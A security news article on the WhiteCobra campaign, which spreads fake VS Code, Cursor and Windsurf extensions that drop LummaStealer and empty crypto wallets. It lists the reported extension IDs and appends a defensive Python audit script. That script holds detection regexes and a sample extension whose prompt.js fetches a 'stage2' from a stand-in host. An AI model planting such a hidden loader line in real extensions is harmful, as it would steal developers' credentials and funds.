WhiteCobra hackers have turned code editors into weapons of mass destruction.
The WhiteCobra hacker group launched a large-scale attack against users of the popular code editors VS Code, Cursor, and Windsurf. Researchers from Koi Security discovered 24 malicious extensions hosted in the official Visual Studio Marketplace and Open VSX repositories. Despite removing some of them, the attackers continue to upload new versions, keeping the campaign active.
One of the victims was Ethereum developer Zach Cole, whose crypto wallet was emptied after installing the contractshark.solidity-lang add-on for the Cursor editor. The extension appeared legitimate: it had a professionally designed icon, a detailed description, and tens of thousands of downloads.
This disguise allowed WhiteCobra to attract a large number of users. The same group was previously implicated in a July theft of approximately half a million dollars in cryptocurrency by distributing a fake Cursor extension.
The attack exploits a vulnerability in the ecosystem itself: a single VSIX package format is used across multiple editors, and downloaded add-ons undergo minimal verification. This allows the attackers to quickly adapt and scale their campaign.
Koi Security notes that each of the created extensions mimics legitimate projects, copying their names and descriptions. The list of detected fake packages includes ChainDevTools.solidity-pro, kilocode-ai.kilo-code, nomic-fdn.hardhat-solidity, juan-blanco.solidity, Ethereum.solidity-ethereum, and many others. They were found in both Open VSX and the VS Code Marketplace.
Technically, the malicious add-ons are quite simple. The main extension.js file almost exactly replicates the "Hello World" template, but contains a hidden call to another script, prompt.js. This script, in turn, downloads the payload from Cloudflare Pages servers. For Windows, a PowerShell script is provided that runs Python code and injects shellcode, which then activates LummaStealer, a known data-stealing Trojan. It targets cryptocurrency wallets, browser extensions, saved passwords, and instant messaging conversations. On macOS, a Mach-O binary for ARM and Intel is used, which downloads another, as yet unclassified, malware.
Experts obtained an internal WhiteCobra playbook detailing the campaign's financial goals, methods for promoting fake extensions, and instructions for deploying command and control infrastructure. This data suggests the group operates in an organized manner and can launch new waves of attacks within three hours of previous ones being blocked. The documents list sums ranging from $10,000 to half a million dollars, which the criminals plan to obtain in a single series of operations.
Experts emphasize that traditional signals such as download counts, positive reviews, and ratings are no longer reliable indicators of safety. These metrics are easily manipulated, and fake projects often impersonate the names of well-known developers or organizations. Therefore, it is recommended to carefully check extensions before installing them, pay attention to suspicious name similarities, and be wary of projects that have quickly accumulated tens of thousands of downloads.
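As an added illustration of the extension layout described above and of the pre-install checks recommended here (example code, not from Koi Security or the original article): a small audit routine that reads an installed extension's package.json, compares its publisher.name ID against the IDs named in this report (exact and near matches), and flags an entry file of "Hello World" size that pulls in a second local script which reaches out to the network. The sample extension it builds in a temporary directory, including the placeholder.invalid URL, is constructed here for demonstration and contains no payload.

```python
import difflib, json, re, tempfile
from pathlib import Path
# Extension IDs (publisher.name, lower-cased) named in the report above.
REPORTED_IDS = {
    "contractshark.solidity-lang", "chaindevtools.solidity-pro",
    "kilocode-ai.kilo-code", "nomic-fdn.hardhat-solidity",
    "ethereum.solidity-ethereum",
}
# A second local script loaded from the entry file, and signs of download/exec in it.
LOCAL_REQUIRE = re.compile(r"""require\(\s*['"](\.{1,2}/[^'"]+)['"]\s*\)""")
NETWORK_OR_EXEC = re.compile(r"https?://|\bfetch\(|https\.get\(|child_process")

def audit_extension(ext_dir: Path) -> list[str]:
    """Return findings for one installed extension directory (empty = nothing flagged)."""
    findings = []
    manifest = json.loads((ext_dir / "package.json").read_text())
    ext_id = f"{manifest.get('publisher', '')}.{manifest.get('name', '')}".lower()
    if ext_id in REPORTED_IDS:
        findings.append(f"{ext_id}: ID matches a reported malicious extension")
    elif (close := difflib.get_close_matches(ext_id, REPORTED_IDS, n=1, cutoff=0.8)):
        findings.append(f"{ext_id}: ID closely resembles reported {close[0]}")
    entry = ext_dir / manifest.get("main", "extension.js")
    if entry.exists():
        for rel in LOCAL_REQUIRE.findall(entry.read_text()):
            helper = entry.parent / rel
            if helper.exists() and NETWORK_OR_EXEC.search(helper.read_text()):
                findings.append(f"{ext_id}: {entry.name} loads {helper.name}, "
                                "which contains network or process activity")
    return findings

def build_sample_extension(root: Path) -> Path:
    """Constructed stand-in for the reported layout: no payload, placeholder URL."""
    ext = root / "contractshark.solidity-lang-0.0.1"
    ext.mkdir(parents=True)
    (ext / "package.json").write_text(json.dumps(
        {"publisher": "contractshark", "name": "solidity-lang", "main": "./extension.js"}))
    (ext / "extension.js").write_text(  # the 'Hello World' template plus one extra line
        'const vscode = require("vscode");\nrequire("./prompt.js");\n'
        'exports.activate = () => vscode.window.showInformationMessage("Hello World");\n')
    (ext / "prompt.js").write_text(  # constructed placeholder URL, resolves nowhere
        'require("https").get("https://placeholder.invalid/stage2", () => {});\n')
    return ext

def run_demo() -> list[str]:
    """Build the constructed sample in a temp dir, audit it, return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_extension(build_sample_extension(Path(tmp)))

if __name__ == "__main__":
    print("\n".join(run_demo()))
```

Pointing `audit_extension` at each directory under a real `~/.vscode/extensions` (or the Cursor and Windsurf equivalents) turns this into a local sweep; the ID list and regexes are heuristics to extend, not a complete signature set.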
WhiteCobra has clearly demonstrated vulnerabilities in the VS Code ecosystem and compatible editors, where a lack of strict moderation allows malicious extensions to be introduced, disguised as popular tools. For users, this means extra caution, as even a familiar work tool can become a channel for the theft of cryptocurrency and credentials.